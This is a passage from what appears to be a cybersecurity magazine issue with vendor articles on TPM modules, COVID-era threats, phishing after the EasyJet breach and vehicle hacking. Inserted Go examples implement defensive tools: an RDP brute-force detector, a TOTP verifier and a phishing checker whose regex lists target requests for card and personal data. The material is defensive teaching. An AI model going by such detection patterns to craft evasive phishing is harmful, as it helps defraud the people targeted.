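	fmt.Println("sensor authenticated:", Authenticate(reg, "sensor-01", "gateway-01", nonce, resp))
	img := []byte("firmware image v1 (constructed)")
	sig := SignFirmware(vendor, "plc-class-a", img)
	fmt.Println("boot on class a:", VerifyBoot(vendor.PublicKey(), "plc-class-a", img, sig))
	fmt.Println("boot on class b:", VerifyBoot(vendor.PublicKey(), "plc-class-b", img, sig))
}
```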
Retrofittable and future-proof<br />
In comparison to a soldered TPM, the idea of a pluggable security module might at first seem unusual.<br />
However, older machinery and systems generally have a USB interface or interfaces for memory cards<br />
(Fig. 2). Therefore, the big advantage of using pluggable security modules is that existing devices can<br />
easily be retrofitted and secured using Swissbit security memory.<br />
This ability to retrofit devices offers another advantage in the constant race to keep up with cyber security.<br />
Attack and defense methods develop cyclically, and harmonizing them with, for example, the project<br />
lifecycle of an industrial plant is challenging. A situation could arise where it is necessary to allocate a new<br />
ID with improved cryptography to the M2M communication participants. Swissbit’s<br />
retrofittable solution makes this possible.<br />
Fig 2. Memory interfaces, such as USB, can be used to retrofit a TPM function.<br />
Outlook<br />
In response to the rapidly increasing market demand for embedded IoT, Swissbit opened its new factory<br />
in October 2019, located in Berlin, Germany. This factory is equipped with state-of-the-art advanced 3D<br />
chip scale packaging technology, developing and producing customized system-in-package and multichip<br />
module designs for its customers. This technology facilitates not only the integration of<br />
microcontrollers, NAND chips and crypto chips, but also sensors, wireless chips and antennas. Using<br />
memory interfaces to carry TPM and encryption components may be only the beginning, with scope for<br />
further functions to be miniaturized and integrated in the same way.<br />
About the Author<br />
Hubertus Grobbel is the Vice President Security Solutions at Swissbit.<br />
Hubertus can be reached online at [email]<br />
and at our company website https://swissbit.com/en/<br />
How To Fight A Virus: Lessons From Cybersecurity<br />
By Yotam Gutman, SentinelOne<br />
There has been a great deal of conversation around the similarities between the spread of the Covid-19<br />
virus and that of computer viruses. And indeed, as the first global pandemic to occur during the age of<br />
connectivity, this comparison is valid. But while most focus on how we can leverage the knowledge gained<br />
in the “real world” in identifying and stopping the spread of plagues in the virtual world, I would like to<br />
offer another perspective.<br />
Perhaps we in cybersecurity can return the favor. Perhaps the medical world can take the lessons learned<br />
in three decades of fighting “cyber viruses” and implement these in their fight to mitigate the Coronavirus?<br />
History<br />
The type of computer software described as “a program that can infect other programs by<br />
modifying them to include a, possibly evolved, version of itself” was named a “virus” by Fred Cohen in his<br />
1986 Ph.D. thesis. Another biological term entered computer lingo when the first worm was unleashed<br />
(although the word had already been used in that sense in John Brunner’s 1975 science-fiction novel The Shockwave Rider).<br />
In the last few years, computer viruses, or more broadly the whole panoply of malware that cybersecurity<br />
deals with today, have evolved rapidly in ways that make them much harder to identify<br />
and mitigate:<br />
More variants: 439,000 new malware variants were detected in 2019. That’s a 12.3% increase over the<br />
previous year.<br />
More capable: Modern malware threats are far more capable than the old viruses spreading through<br />
illegal copies of software distributed via floppy-disks. Today’s malware can steal passwords, exfiltrate<br />
sensitive data, encrypt and delete data, and much more.<br />
Harder to detect: Malware authors work hard to make their software difficult to detect. This includes hiding<br />
it in legitimate-looking documents (“weaponized” Word, PDF and Excel files), using detection-evasion<br />
mechanisms (such as refusing to execute inside a sandbox) and abusing legitimate software<br />
update mechanisms, all to make the defenders’ work harder.<br />
More aggressive: Some malware is extremely aggressive; it scans for exposed RDP ports, brute-forces<br />
its way onto a device and then moves laterally through the organization’s network, abusing<br />
password-protected servers and hunting for sensitive data, all without the victim’s knowledge.<br />
Fast: Contemporary malware works at machine speed to bypass protection mechanisms and achieve its<br />
goals; the WannaCry ransomware worm disabled entire organizations in minutes.<br />
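The “more aggressive” pattern above, RDP brute force followed by a foothold, is one of the easier ones to spot in authentication logs. The added example below (this editor's code, not SentinelOne's) slides a window over failed logons per source address, raises an alert when the count crosses a threshold, and marks the alert as a probable compromise when the same source later logs on successfully. The log format and the addresses are constructed for the example; only the parsing step would change for real Windows 4625/4624 or xrdp records.<br />

```go
package main

import (
	"fmt"
	"sort"
	"strings"
	"time"
)

type Event struct {
	At      time.Time
	Success bool
	Src     string
	User    string
}

// ParseLine reads the constructed format used below:
//   <RFC3339 time> RDP LOGON_OK|LOGON_FAILED src=<ip> user=<name>
// Real sources (Windows 4624/4625, xrdp) differ only in this extraction step.
func ParseLine(line string) (Event, bool) {
	f := strings.Fields(line)
	if len(f) != 5 || f[1] != "RDP" || !strings.HasPrefix(f[3], "src=") || !strings.HasPrefix(f[4], "user=") {
		return Event{}, false
	}
	at, err := time.Parse(time.RFC3339, f[0])
	if err != nil {
		return Event{}, false
	}
	return Event{At: at, Success: f[2] == "LOGON_OK", Src: f[3][4:], User: f[4][5:]}, true
}

// Alert is one source that crossed the failure threshold. Compromised is set
// when that source later logged on successfully: a brute force that worked.
type Alert struct {
	Src         string
	Failures    int
	Compromised bool
	Account     string
}

// DetectBruteForce flags every source with at least threshold failures inside
// some span of length window, and marks it compromised if a success followed.
func DetectBruteForce(lines []string, threshold int, window time.Duration) []Alert {
	bySrc := map[string][]Event{}
	for _, l := range lines {
		if e, ok := ParseLine(l); ok {
			bySrc[e.Src] = append(bySrc[e.Src], e)
		}
	}
	var alerts []Alert
	for src, evs := range bySrc {
		sort.Slice(evs, func(i, j int) bool { return evs[i].At.Before(evs[j].At) })
		var fails []time.Time
		start, peak := 0, 0
		for _, e := range evs {
			if e.Success {
				continue
			}
			fails = append(fails, e.At)
			for e.At.Sub(fails[start]) > window { // slide: drop failures older than the window
				start++
			}
			if n := len(fails) - start; n > peak {
				peak = n
			}
		}
		if peak < threshold {
			continue
		}
		a := Alert{Src: src, Failures: peak}
		for _, e := range evs { // a success after the burst began is the real finding
			if e.Success && !e.At.Before(fails[0]) {
				a.Compromised, a.Account = true, e.User
			}
		}
		alerts = append(alerts, a)
	}
	sort.Slice(alerts, func(i, j int) bool { return alerts[i].Src < alerts[j].Src })
	return alerts
}

// SampleLog is constructed for this example; the addresses are documentation ranges.
var SampleLog = []string{
	"2020-06-01T10:00:01Z RDP LOGON_FAILED src=203.0.113.7 user=administrator",
	"2020-06-01T10:00:02Z RDP LOGON_FAILED src=203.0.113.7 user=admin",
	"2020-06-01T10:00:02Z RDP LOGON_FAILED src=203.0.113.7 user=backup",
	"2020-06-01T10:00:03Z RDP LOGON_FAILED src=203.0.113.7 user=svc_sql",
	"2020-06-01T10:00:04Z RDP LOGON_FAILED src=203.0.113.7 user=helpdesk",
	"2020-06-01T10:00:09Z RDP LOGON_OK src=203.0.113.7 user=helpdesk",
	"2020-06-01T10:05:00Z RDP LOGON_FAILED src=198.51.100.20 user=jsmith",
	"2020-06-01T10:05:30Z RDP LOGON_OK src=198.51.100.20 user=jsmith",
}

func main() {
	for _, a := range DetectBruteForce(SampleLog, 5, time.Minute) {
		fmt.Printf("%s: %d failures in one minute, compromised=%v account=%s\n", a.Src, a.Failures, a.Compromised, a.Account)
	}
}
```

The single mistyped password from the second address never fires, which is the point of counting per source inside a window rather than counting failures globally; the alert that does fire names the account that was eventually opened, which is where the lateral-movement hunt should start.<br />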
Adopting Cybersecurity Response to Fight Covid-19<br />
To mitigate today’s plethora of rapidly evolving cyber threats, the cybersecurity industry has developed<br />
several methodologies. Suitably adapted, these could be used to reduce the spread of the biological<br />
virus and to mitigate its effects. I will refrain from discussing the obvious virus/anti-virus analogy.<br />
Obviously, a vaccine would be the answer, but estimates at the time of writing suggest that one will not<br />
be available for another 12-18 months, and there is a lot we can do until then:<br />
Zero trust policy: a methodology that rejects the traditional security assumption that everything inside the<br />
perimeter (protected by the firewall) is trusted. The main principle of Zero Trust is “never trust, always<br />
verify”. Every user must prove their identity each time they wish to “enter” the organization, and every<br />
file and process is continuously monitored, even after it has been “authorized” to run on the computer.<br />
In a similar manner, humans should consider that other humans may be carriers, and only “trust” them after<br />
they have tested negative (or, at a minimum, have had their temperature taken).<br />
Detection beats prevention: following a similar line of thought, most organizations today operate under<br />
the “assume breach” paradigm. Instead of striving to identify and block 100% of threats 100% of the<br />
time, they accept that some threats will get in and concentrate on finding those quickly and stopping<br />
them before they can do more harm.<br />
Similarly, it is prudent to assume that humanity will not vanquish this virus outright and that we will be<br />
playing “whack-a-mole” with it for the foreseeable future. Given that, it makes sense to invest<br />
in rapid detection of infection (quick test kits, even home test kits), ensure that those who are<br />
sick are treated quickly, and keep monitoring the entire population for outbreaks.<br />
Segmentation: an important principle that limits “movement” within the organization, so that intruders<br />
cannot move freely and infect other parts of it.<br />
The real-life manifestation would be to identify infection “hot spots”, lock those down and then tend to<br />
those infected, rather than locking down entire countries.<br />
Risk modeling: it might be possible, in theory, to provide 100% security 100% of the time, but the cost to<br />
the organization would be prohibitive; either security spending would go through the roof, or the<br />
restrictions needed to maintain it would bring the business to a standstill. Instead, a CISO<br />
conducts risk assessments and prioritizes security spending to mitigate the most acute threats and<br />
secure the most valuable assets.<br />
Healthcare officials should do the same, ensuring that the most vulnerable segments of the population<br />
(the elderly, the sick) are shielded from the disease and, if need be, given better care.<br />
Intelligence intake: fighting a stealthy enemy is hard because you don’t know what to expect. Security<br />
professionals, governments, and those in the security industry have been formally and informally sharing<br />
information about malware, cybercrime groups, and data leaks for a long time. This has proved to be<br />
immensely helpful in fighting and defeating cybercrime rings.<br />
Such collaboration should also be adopted by global scientific, medical communities, governments, and<br />
healthcare organizations. As this threat is new to humanity, we should all share information about<br />
detection and treatment mechanisms and notify others when we think we’ve made breakthroughs in<br />
finding a cure or a vaccine.<br />
Conclusion<br />
We can debate the similarities between biological and computer “viruses” (which, some argue, more<br />
resemble bacteria than viruses), but the analogy is, for the most part, correct. Viruses are dangerous<br />
to the victims, and they spread quickly through the population until a cure, or a vaccine is found. The<br />
spread of the Coronavirus pandemic and its impact on our lives is nothing like the world has seen before.<br />
It spread almost at machine speed and overwhelmed countries and healthcare organizations. We believe<br />
that utilizing the lessons learned by the cybersecurity industry in the past 3 decades could help to thwart<br />
the Coronavirus pandemic.<br />
About the Author<br />
Lt. Commander (Ret.), Israel Navy, Yotam Gutman has filled several operational, technical and business positions<br />
at defense, HLS, intelligence and cybersecurity companies, and has provided consulting services for numerous<br />
others. Yotam joined SentinelOne six months ago to oversee local marketing activities in Israel and to contribute<br />
to the global content marketing team. Yotam founded and managed the Cybersecurity Marketing Professionals<br />
Community, which includes over 300 marketing professionals from more than 170 cyber companies.<br />
Yotam was chosen as one of the 5 Security Influencers to Follow on LinkedIn.<br />
How to Combat Cybersecurity Attacks & Cyber Warfare<br />
By Adnan Olia, Chief Operating Officer and Co-owner of Intradyn<br />
It’s no secret that cybersecurity attacks and cyber warfare are real challenges and threats to the safety<br />
of individuals, businesses, organizations — and especially the government. Personal and professional<br />
data, including passwords, credit card and bank account information, and Social Security numbers can<br />
be vulnerable. Plus, it can take months — even years — to recover from cyberattacks and cases of<br />
identity theft. According to CNBC, cyberattacks cost businesses of all sizes an average of $200,000, and<br />
“60% go out of business within six months of being victimized.”<br />
A professor of business technology predicted in a recent Forbes article that cyberattacks will be more<br />
prevalent in 2020 “because it’s the cheapest, easiest, fastest, and most effective form of warfare we’ve<br />
ever seen, and because cyberwarfare defenses are more vulnerable than they’ve ever been.”<br />
But what is cyber warfare, exactly? The RAND Corporation defines the term as “the actions by a nation-state<br />
or international organization to attack and attempt to damage another nation’s computers or<br />
information networks through, for example, computer viruses or denial-of-service attacks.”<br />
There are many types of attacks and warfare, including phishing, ransomware, and mobile- and cloud-based<br />
attacks. We’ll outline some of the most common and offer solutions to help you take the necessary<br />
precautions and steps toward securing your data and private information.<br />
What Are the Different Types of Threats?<br />
Phishing<br />
The U.S. Securities and Exchange Commission defines phishing as “the use of fraudulent emails and<br />
copy-cat websites to trick you into revealing valuable personal information — such as account numbers<br />
for banking, securities, mortgage, or credit accounts, your Social Security numbers, and the login IDs<br />
and passwords you use when accessing online financial services providers.”<br />
The goal, of course, is to use your personal information to steal your money and/or your identity. Phishing<br />
also arrives by SMS text message, and there is now the possibility of “spear-phishing by<br />
video”, in which attackers “leverage new tools such as ‘deep fake’ technology to look and sound<br />
like a trusted person (e.g., a FaceTime call with an attacker posing as a CEO).”<br />
An article about 2020 cybersecurity predictions from SC Media predicts that “company microtargeting<br />
with industry-specific tools will rise.” It’s more important than ever that organizations have the proper<br />
controls in place to educate their employees and detect these kinds of threats.<br />
Ransomware<br />
The Department of Homeland Security defines ransomware as “a type of malicious software, or malware,<br />
designed to deny access to a computer system or data until a ransom is paid. Ransomware typically<br />
spreads through phishing emails or by unknowingly visiting an infected website.”<br />
According to a recent Forbes article, business ransomware attacks were on the rise in the first quarter of<br />
2019, and the trend is expected to continue in 2020 because “as the FBI softens its stance on businesses<br />
paying ransoms, the number of ‘successful’ ransomware attacks (i.e. those in which the ransom is paid)<br />
will double, with total losses of all reported attacks increasing significantly.”<br />
Mobile Attacks<br />
The Pew Research Center estimates that more than 5 billion people around the globe have mobile<br />
devices (over half of which are smartphones), and according to HubSpot, 52% of web traffic around the<br />
world is mobile.<br />
With so much widespread cell phone ownership and use, it’s no wonder that hackers are threatening<br />
mobile devices. According to Lookout, “traditional secure email gateways block potential phishing emails<br />
and malicious URLs, which works for protecting corporate email from account takeover attacks, but<br />
neglects mobile attack vectors, including personal email, social networking, and other mobile centric<br />
messaging platforms such as secure messaging apps and SMS/MMS.”<br />
It’s also worth noting that every new piece of technology (such as the latest smartphone model)<br />
brings its own security challenges. The rollout of 5G, for example, brings new opportunities for<br />
malware, according to AVG.<br />
Cloud-Based Attacks<br />
According to Threatpost, “as more corporate infrastructure moves to the cloud, so will the focus of<br />
criminals.” This means that while conducting an attack will be more of a challenge, attacks may become<br />
more sophisticated and more common.<br />
Businesses and organizations are also more confident when it comes to the cloud. But confidence doesn’t<br />
always translate to tighter security measures. According to Forbes, “60% of organizations don’t<br />
understand the shared responsibility model when it comes to who secures workloads in the cloud. This<br />
will create a false sense of security in cloud security providers by their customers, as the latter are<br />
responsible for securing privileged access to their cloud administration accounts and workloads.”<br />
Artificial Intelligence and Voice Phishing<br />
As technology becomes more advanced, so do the types of cyberattack. For example, “deepfake<br />
technology” can be used to exploit people in scams. According to MSNBC, the term deepfake refers to<br />
digital content produced by manipulating images and voices, even to the point of fabricating<br />
videos that look real. In one instance, according to Forbes, a CEO gave up $243,000<br />
because of a deepfake voice scam.<br />
An article about 2020 cybersecurity predictions in SC Magazine asserts that “voice phishing will become<br />
the new phishing bait.” In other words, it’s now easier than ever for scammers to sound like someone<br />
else. High-level people such as executives and politicians are expected to face heightened risk with<br />
advanced deepfake technology. Those scammers can then leave voicemails (or speak directly with<br />
callers) asking for donations or for personal information.<br />
How to Protect Yourself: Solutions & Tips<br />
There are many ways to protect yourself — and your business or organization — from cyberattacks and<br />
cyberwarfare. The Department of Homeland Security (DHS) is a good place to start and provides the<br />
following tips:<br />
• Maintain up-to-date software and operating systems<br />
• Ensure that your passwords are strong<br />
• Remain vigilant and watch out for suspicious activity<br />
• Do not click on links or open emails if you’re unsure<br />
• Do not provide personal information<br />
• Use secure internet connections<br />
• Back up your folders and files<br />
• Protect your home and/or business network<br />
Protecting your email is especially important. Investing in a good email archiving solution can also help<br />
you mitigate a potential attack by offering backup and disaster recovery options.<br />
It’s also important to scrutinize the email messages you receive. Poor spelling and<br />
grammar, mismatched URLs (link text that points somewhere else), requests for personal information and<br />
messages about actions you never initiated are just some of the signs of a possible phishing attack.<br />
DHS recommends “two-step verification”; most other resources call the same control multi-factor<br />
authentication (MFA). It means that a computer (or mobile device) grants access only after you present at<br />
least two pieces of “evidence” from different categories: something you know (a password or PIN),<br />
something you are (a fingerprint or voice pattern) and something you have (a hardware security token,<br />
or the one-time code an authenticator app generates). Two factors of the same kind, such as a password<br />
plus a security question, do not give the same protection.<br />
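To make the “something you have” factor concrete, here is an added example (this editor's code, not from the article, DHS or any authenticator vendor) of the time-based one-time password that authenticator apps generate, following RFC 6238 with the common HMAC-SHA1, 30-second, 6-digit parameters, together with the server-side check that tolerates one step of clock skew and refuses to accept the same time step twice. The secret is the RFC's published test key, used only so the output can be compared against the RFC's own vectors; a real enrolment generates a random secret per user.<br />

```go
package main

import (
	"crypto/hmac"
	"crypto/sha1"
	"crypto/subtle"
	"encoding/binary"
	"fmt"
	"time"
)

// TOTP computes the RFC 6238 one-time password for time t: HMAC-SHA1 over the
// 30-second step counter, dynamically truncated to the requested digit count.
// The shared secret lives in the phone app and on the server, nowhere else.
func TOTP(secret []byte, t time.Time, digits int) string {
	var msg [8]byte
	binary.BigEndian.PutUint64(msg[:], uint64(t.Unix()/30))
	mac := hmac.New(sha1.New, secret)
	mac.Write(msg[:])
	h := mac.Sum(nil)
	// Dynamic truncation (RFC 4226 section 5.3): the low nibble of the last byte
	// selects a 4-byte window; its top bit is cleared to avoid sign confusion.
	off := h[len(h)-1] & 0x0f
	code := binary.BigEndian.Uint32(h[off:off+4]) & 0x7fffffff
	mod := uint32(1)
	for i := 0; i < digits; i++ {
		mod *= 10
	}
	return fmt.Sprintf("%0*d", digits, code%mod)
}

// Authenticator is the server side of the second factor for one user. It
// remembers the last accepted time step so a code observed in transit cannot be
// replayed within the skew window.
type Authenticator struct {
	Secret      []byte
	LastCounter uint64
}

// Verify accepts the code for the current 30-second step or one step either
// side (phone and server clocks drift), compares in constant time so response
// timing does not reveal how many digits matched, and refuses reused steps.
func (a *Authenticator) Verify(code string, now time.Time) bool {
	if len(code) != 6 {
		return false
	}
	for _, skew := range []time.Duration{-30 * time.Second, 0, 30 * time.Second} {
		t := now.Add(skew)
		counter := uint64(t.Unix() / 30)
		if counter <= a.LastCounter {
			continue // this step was already used: replay
		}
		if subtle.ConstantTimeCompare([]byte(TOTP(a.Secret, t, 6)), []byte(code)) == 1 {
			a.LastCounter = counter
			return true
		}
	}
	return false
}

func main() {
	// RFC 6238 Appendix B test secret, so the output can be checked against the RFC.
	secret := []byte("12345678901234567890")
	fmt.Println("T=59, 8 digits:", TOTP(secret, time.Unix(59, 0), 8)) // RFC vector 94287082
	a := &Authenticator{Secret: secret}
	now := time.Now()
	code := TOTP(secret, now, 6)
	fmt.Println("first use:", a.Verify(code, now), "replay:", a.Verify(code, now))
}
```

The replay check is the part most home-grown implementations omit: without it, a code phished from the user in real time remains valid for up to 90 seconds, which is exactly the window a relay attacker needs.<br />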
Many organizations are also adopting Disaster Recovery-as-a-Service (DRaaS), which is “defined as<br />
providing a remotely hosted disaster recovery service to protect a business’s data and applications,”<br />
according to Carbonite.<br />
With the sheer volume and variety of cyberattacks and warfare targeting individuals and organizations,<br />
it’s more important than ever to take the appropriate precautions to ensure that personal information and<br />
data remains secure and safe.<br />
About the Author<br />
Adnan Olia, Chief Operating Officer and Co-owner of Intradyn<br />
COVID-19 And the EasyJet Hack - A Perfect Phishing Storm<br />
By Shachar Daniel, Safe-T’s CEO<br />
As if the airline industry didn’t have enough to worry about at the moment, on May 19 EasyJet, the UK’s<br />
biggest budget airline, announced that it had been breached. Exposed in the attack were the email addresses<br />
and travel information of 9 million customers. A small group of customers also had their credit card<br />
details, including the CVV, exposed in the attack, which lasted from October 2019 to March 2020.<br />
Although EasyJet first learned about the attack in January, they only began informing those customers<br />
whose credit card information was exposed in April. The airline said they did not disclose the attack earlier<br />
due to the complexity involved in piecing together which systems and which individuals had been<br />
affected. According to the UK's Information Commissioner's Office, “This was a highly sophisticated<br />
attacker. It took time to understand the scope of the attack and to identify who had been impacted."<br />
Bad Timing - COVID-19 and Airline Scams<br />
The EasyJet hack just happens to come at a spectacularly rotten time, as airlines around the world,<br />
EasyJet included, are dealing with severe losses due to COVID-19. According to Dr Jason Nurse of the<br />
Kent Interdisciplinary Research Center, “It is clearly a difficult time for the travel industry considering the<br />
impact of COVID-19 on operations. A cyber-attack is the last thing an airline would want to deal with<br />
now.”<br />
To make matters even more complicated, authorities have warned customers to be on the lookout for<br />
phishing emails offering refunds on flights, now that their personal details may be up for grabs on the<br />
dark web. According to privacy expert Ray Walsh, "Anybody who has ever purchased an EasyJet flight is<br />
advised to be extremely wary when opening emails from now on...Phishing emails that leverage data<br />
stolen during the attack could be used as an attack vector at any point in the future.”<br />
In fact, a recent statement from EasyJet urged customers to think critically when opening EasyJet<br />
emails: "We are advising customers to be cautious of any communications purporting to come<br />
from EasyJet or EasyJet Holidays."<br />
But EasyJet was not the only airline to have phishing campaigns associated with it over the course of the<br />
pandemic. As the impact of COVID-19 began to take hold in late March and airlines started canceling<br />
flights, Emirates Airlines warned customers about circulating fake flight refund emails and email security<br />
provider Mimecast alerted authorities to a major uptick in flight-related email scams involving a variety of<br />
airlines. Other security firms noted a rise in voice-based flight cancellation scams, wherein scammers,<br />
posing as airline agents, called random people to discuss purported flight cancellations, and in the<br />
process, tried extracting personal information.<br />
And now, as airlines across the world attempt to cut their losses, they are offering heavy discounts on<br />
flights for whenever regular service resumes. As inboxes fill up with enticing promotions offering deals<br />
on future flights, customers should remember that while many of these emails are legitimate, a significant<br />
portion are phishing emails cashing in on the confusion created by COVID-19.<br />
How to Spot a Travel-Based Phishing Email<br />
Meanwhile, it’s important to note that since travel information was included in the stolen EasyJet data<br />
set, phishing emails sent to those customers may be highly targeted and include real elements, like dates<br />
and destinations, making the emails seem legitimate. If your data was exposed in the EasyJet hack, there<br />
are some relatively simple ways to protect yourself from falling prey to the ensuing phishing threats.<br />
What’s more, these tips can be just as easily applied to any trending COVID-19 airline email scams out<br />
there today. So when you get flight promotions or cancellation notices, be sure to:<br />
- Look at the sender's email address. Does it match the name of the airline, or is it slightly off? For<br />
example, if it says EasyJetTravel.com, JetBlueFlights.com or SouthWestTickets.com, you can<br />
rest assured it’s a scam.<br />
- Avoid any email requesting personal information, such as credit card details, dates of birth<br />
or social security numbers.<br />
- Delete messages that include links or attachments, which are often filled with malware payloads.<br />
- Think twice when it comes to promotions requiring the reader to take action NOW! Scammers try<br />
to get their targets to act impulsively, before critical thinking can get in the way. If there’s no time<br />
to make a thought-out decision, that's a bad sign.<br />
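Three of these tips, together with the “mismatched URLs” and “messages asking for personal information” signs listed in the previous article, can be checked mechanically before a human ever reads the message. The added example below (this editor's code, not EasyJet's, Safe-T's or Intradyn's) parses a raw email, compares the sender's domain against an allowlist of the airlines' genuine domains, flags links whose visible text names a different host than the one the href actually points to, and looks for urgency and personal-data wording. The allowlist, the keyword lists and the sample message are constructed for the example; the look-alike domain is the article's own EasyJetTravel.com.<br />

```go
package main

import (
	"fmt"
	"io"
	"net/mail"
	"net/url"
	"regexp"
	"strings"
)

// Constructed allowlist of the airlines' genuine domains; a deployment would load the published ones.
var legitDomains = []string{"easyjet.com", "jetblue.com", "southwest.com"}
var brands = []string{"easyjet", "jetblue", "southwest"}

var (
	anchorRe  = regexp.MustCompile(`(?is)<a\s[^>]*href="([^"]+)"[^>]*>(.*?)</a>`)
	urgencyRe = regexp.MustCompile(`(?i)act now|immediately|within 24 hours|expires today|final notice`)
	piiRe     = regexp.MustCompile(`(?i)credit card|card number|cvv|date of birth|social security|passport number`)
)

// isLegit accepts an allowlisted domain or a subdomain of one: mail.easyjet.com passes, easyjettravel.com does not.
func isLegit(host string) bool {
	for _, d := range legitDomains {
		if host == d || strings.HasSuffix(host, "."+d) {
			return true
		}
	}
	return false
}

// hostOfText returns the host a link's visible text claims when that text is a URL or bare domain, else "".
func hostOfText(text string) string {
	text = strings.TrimSpace(text)
	if strings.ContainsAny(text, " \t\r\n<") {
		return "" // ordinary words such as "View offers"
	}
	if !strings.Contains(text, "://") {
		text = "http://" + text
	}
	if u, err := url.Parse(text); err == nil && strings.Contains(u.Hostname(), ".") {
		return strings.ToLower(u.Hostname())
	}
	return ""
}

// Findings runs the checks over one raw RFC 5322 message; one line per red flag, empty means none fired.
func Findings(raw string) ([]string, error) {
	msg, err := mail.ReadMessage(strings.NewReader(raw))
	if err != nil {
		return nil, err
	}
	from, err := mail.ParseAddress(msg.Header.Get("From"))
	if err != nil {
		return nil, err
	}
	b, _ := io.ReadAll(msg.Body) // reading from a strings.Reader cannot fail
	body := string(b)
	var out []string
	// 1. Sender: the airline's name inside a domain the airline does not own ("slightly off").
	host := strings.ToLower(from.Address[strings.LastIndex(from.Address, "@")+1:])
	for _, brand := range brands {
		if !isLegit(host) && strings.Contains(host, brand) {
			out = append(out, "sender domain looks like "+brand+" but is not the airline's: "+host)
		}
	}
	// 2. Links: visible text that names one host while the href goes to another.
	for _, m := range anchorRe.FindAllStringSubmatch(body, -1) {
		if u, err := url.Parse(m[1]); err == nil {
			target := strings.ToLower(u.Hostname())
			if shown := hostOfText(m[2]); shown != "" && shown != target {
				out = append(out, "link text shows "+shown+" but points to "+target)
			}
		}
	}
	// 3. Pressure to act before thinking.
	if w := urgencyRe.FindString(body); w != "" {
		out = append(out, "urgency language: "+w)
	}
	// 4. A request for personal data the airline would never collect by e-mail.
	if w := piiRe.FindString(body); w != "" {
		out = append(out, "asks for personal data: "+w)
	}
	return out, nil
}

// PhishSample is constructed for this example; it is not a real EasyJet message.
var PhishSample = strings.Join([]string{
	`From: "easyJet Refunds" <refunds@easyjettravel.com>`,
	"Subject: Your flight LGW-AMS on 12 June was cancelled",
	"",
	"<p>Dear customer, your flight was cancelled. Act now to claim your refund within 24 hours.</p>",
	`<p>Confirm your credit card number and date of birth at <a href="http://easyjet-refunds.example/claim">https://www.easyjet.com/refunds</a>.</p>`,
}, "\r\n")

func main() {
	f, err := Findings(PhishSample)
	fmt.Println(len(f), "red flags:", f, err)
}
```

The suffix test in isLegit is deliberate: a plain "contains easyjet.com" check would wave through easyjet.com.evil.example, the oldest trick in look-alike registration, while the subdomain form still lets the airline's real mail.easyjet.com pass.<br />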
COVID-19 is waning and the world is starting to open up again. This is great news for consumers as well<br />
as the airline industry—but as always, remember that scammers love to capitalize on fluctuating<br />
circumstances—so proceed with caution before booking any deals.<br />
About the Author<br />
Shachar Daniel is the CEO at Safe-T and one of its cofounders.<br />
In his role, he is responsible for the overall vision,<br />
company strategy, day-to-day operations, and for growing<br />
Safe-T’s business and presence around the world. Shachar<br />
brings to Safe-T more than 14 years of experience in various<br />
managerial and business roles. Prior to founding Safe-T, he<br />
was program manager at PrimeSense, head of operations for project managers at Logic and project<br />
manager at Elbit Systems. He is an experienced manager with a passion and high commitment for project<br />
delivery. Shachar holds an Executive MBA from The Hebrew University, an MBA from The College of<br />
Management Academic Studies in Israel and a B.Sc. in Industrial Engineering from the Holon Institute of<br />
Technology.<br />
Should We Be Worried About Vehicle Hacking?<br />
And what can we do about it?<br />
By Martin Banks<br />
With more connected devices than ever, cybersecurity is a more prominent issue today than at any time<br />
before. You'll see articles and discussions about security for computers, smartphones and wearables, but these<br />
may not cover everything. As more vehicles gain internet-based functions, should we be worried<br />
about vehicle hacking?<br />
Ten years ago, this question would seem like nothing but science fiction. Now that we're on the cusp of<br />
the driverless vehicle revolution, though, it may require some attention. Here's a closer look at connected<br />
cars and whether they present a cybersecurity risk.<br />
The Rise of the Connected Car<br />
To understand the gravity that vehicle hacking may present, you first have to know how prevalent<br />
connected vehicles are. When you look at the data, you realize these technologies may be more<br />
widespread than you thought. There were more than 50 million shipments of connected cars in 2019, up<br />
45% from the year prior.<br />
With an adoption rate like that, it won't be long before connected cars cover the roads. Not everyone<br />
needs to drive an internet-enabled vehicle for them to impact everyone, either. Any hacked automobile<br />
endangers nearby drivers and passengers, so even with a low penetration rate, they could be risky.<br />
Cars aren't the only connected vehicles out there, either. Other modes of transportation, like ships, are<br />
also becoming increasingly connected.<br />
How Are Vehicles Vulnerable?<br />
It's evident, then, that there are enough connected vehicles for hacking to be a concern. The number of<br />
potential targets isn't the only factor at play, though. You also have to consider what makes these cars<br />
targets in the first place.<br />
The answer is relatively straightforward. Anything that accepts data over a network connection can be<br />
attacked through that connection, and the exposure is greatest when the connection is permanently active.<br />
Internet-based functions in cars, such as online radio, continuously send and receive data, so a flaw in the<br />
software that handles it is reachable by a remote attacker.<br />
Some vehicles use Internet of Things (IoT) devices to track engine performance or measure fuel<br />
efficiency. If these sensors lack proper security features, they give attackers another point of entry.<br />
Is There a Precedent for Vehicle Hacking?<br />
So has anyone hacked into a vehicle before? Yes, and vehicle hacking incidents may be more frequent<br />
than you'd think. According to the cybersecurity firm Upstream, there were roughly 150 car hacking<br />
incidents in 2019.<br />
Considering how many connected cars there are, that figure isn't that massive. You should also consider<br />
that this number also includes hacks on automotive companies, not just cars themselves. Still, it<br />
represents a 99% increase over 2018's hacking incidents, which is a troubling trend.<br />
While these real-world incidents may not have been too harmful, tests show that they could be. In 2015,<br />
researchers Charlie Miller and Chris Valasek remotely cut the power of a Jeep Cherokee while it was being<br />
driven, in a demonstration for Wired. Outside a controlled showcase, the same attack could have had disastrous results.<br />
Responses from Manufacturers<br />
Some good news is that vehicle manufacturers are aware of these potential risks. After the 2015 Wired<br />
hacking demonstration, Fiat Chrysler sent 1.4 million car owners flash drives containing software patches.<br />
Similarly, Tesla updated all Model Xs after researchers hacked into one and activated its brakes.<br />
Both of these instances involve manufacturers responding to an issue they initially missed. Had malicious<br />
actors exploited these problems before white-hat hackers, they could've been much more severe issues.<br />
Still, with these cases attracting media attention, more manufacturers will take cybersecurity seriously<br />
during production.<br />
As vehicles gain more technology, more tech experts are involved in the design and<br />
production process. With these voices present, manufacturers could take a greater interest in<br />
cybersecurity.<br />
Defending Against Vehicle Hacking<br />
Drivers of connected cars aren't helpless concerning cybersecurity. Built-in cybersecurity systems are a<br />
necessary step in vehicle production, but drivers can protect themselves in other ways. The rising<br />
concerns over vehicle cybersecurity have led to the emergence of companies selling third-party security<br />
solutions for cars.<br />
Operators using IoT devices in their vehicles should ask the device providers about security features.<br />
Experts also recommend that they require transparency and high standards from any company that<br />
receives data from these sensors. Fleets shouldn't work with any business that doesn't showcase<br />
appropriate data governance.<br />
If more owners and drivers speak up about security issues, manufacturers will likely respond to the market<br />
